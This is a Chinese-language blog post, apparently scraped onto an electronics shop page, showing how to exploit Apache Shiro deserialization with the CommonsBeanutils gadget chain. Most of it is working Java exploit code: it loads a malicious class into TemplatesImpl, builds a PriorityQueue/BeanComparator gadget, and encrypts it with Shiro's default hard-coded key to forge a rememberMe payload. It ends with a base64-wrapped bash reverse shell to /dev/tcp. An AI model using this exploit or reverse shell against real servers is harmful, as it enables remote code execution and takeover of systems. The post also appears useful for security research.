资讯详情

Apache shiro 反序列化及利用链

无赖调用链:

public class Person {      private String name;     private int age;      public Person(String name, int age) {         this.name = name;         this.age = age;     }      public String getName() {         return name;     }     public void setName(String name) {         this.name = name;     }     public int getAge(){         return age;     }     public void setAge(int age){         this.age = age;     } }

getter该方法采用链流程

CC3链:

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; import org.apache.commons.beanutils.PropertyUtils;  import java.lang.reflect.Field; import java.nio.file.Files; import java.nio.file.Paths;  public class BeanTest {     public static void main(String[] args) throws Exception{         Person person = new Person("Le1a",20);         //System.out.println(PropertyUtils.getProperty(person,"age"));         TemplatesImpl templates = new TemplatesImpl();         Class tc = templates.getClass();         Field nameFiled = tc.getDeclaredField("_name");         nameFiled.setAccessible(true);         nameFiled.set(templates,"aaaa");         Field bytecodesField = tc.getDeclaredField("_bytecodes");         bytecodesField.setAccessible(true);          Field tfactoryField = tc.getDeclaredField("_tfactory");         tfactoryField.setAccessible(true);         tfactoryField.set(templates,new TransformerFactoryImpl());          byte[] code = Files.readAllBytes(Paths.get("D:\\Cc\\IntelliJ IDEA2021.1\\Code\\out\\production\\Code\\ClassLoader\\Hacker.class"));         byte[][] codes = {code};         bytecodesField.set(templates,codes);                  PropertyUtils.getProperty(templates,"outputProperties");     } }

问题:

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.beanutils.BeanComparator;
import org.apache.shiro.crypto.AesCipherService;
import org.apache.shiro.util.ByteSource;

import java.io.*;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.Base64;
import java.util.PriorityQueue;


public class CBAttck {
    public static void main(String[] args) throws Exception{
        byte[] code = Files.readAllBytes(Paths.get("D:\\Cc\\IntelliJ IDEA 2021.1\\Code\\out\\production\\Code\\ClassLoader\\Hacker.class"));
        byte[][] codes = {code};//恶意类
        //CC3
        TemplatesImpl obj = new TemplatesImpl();
        setFieldValue(obj, "_bytecodes",codes);
        setFieldValue(obj, "_name", "aaaa");
        setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());
        //CB
        BeanComparator comparator = new BeanComparator(null,String.CASE_INSENSITIVE_ORDER);
        final PriorityQueue<Object> queue = new PriorityQueue<Object>(2, comparator);
        // stub data for replacement later
        queue.add("1");
        queue.add("1");
        setFieldValue(comparator, "property", "outputProperties");
        setFieldValue(queue, "queue", new Object[]{obj, obj});

        ByteArrayOutputStream barr = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(barr);
        oos.writeObject(queue);
        oos.close();

        byte[] payload= barr.toByteArray();
        AesCipherService aes = new AesCipherService();
        byte [] key = Base64.getDecoder().decode("kPH+bIxk5D2deZiIxcaaaA==");
        ByteSource finalpayload = aes.encrypt(payload,key);
        System.out.println(finalpayload.toString());
    }
    public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
        Field field = obj.getClass().getDeclaredField(fieldName);
        field.setAccessible(true);
        field.set(obj, value);
    }
}

bash -c {echo,Base64编码}|{base64,-d}|{bash,-i}//Base64编码为bash -i >& /dev/tcp/IP/端口 0>&1 的base64编码

标签: 荧光法溶解氧传感器oos61

锐单商城拥有海量元器件数据手册IC替代型号,打造 电子元器件IC百科大全!

锐单商城 - 一站式电子元器件采购平台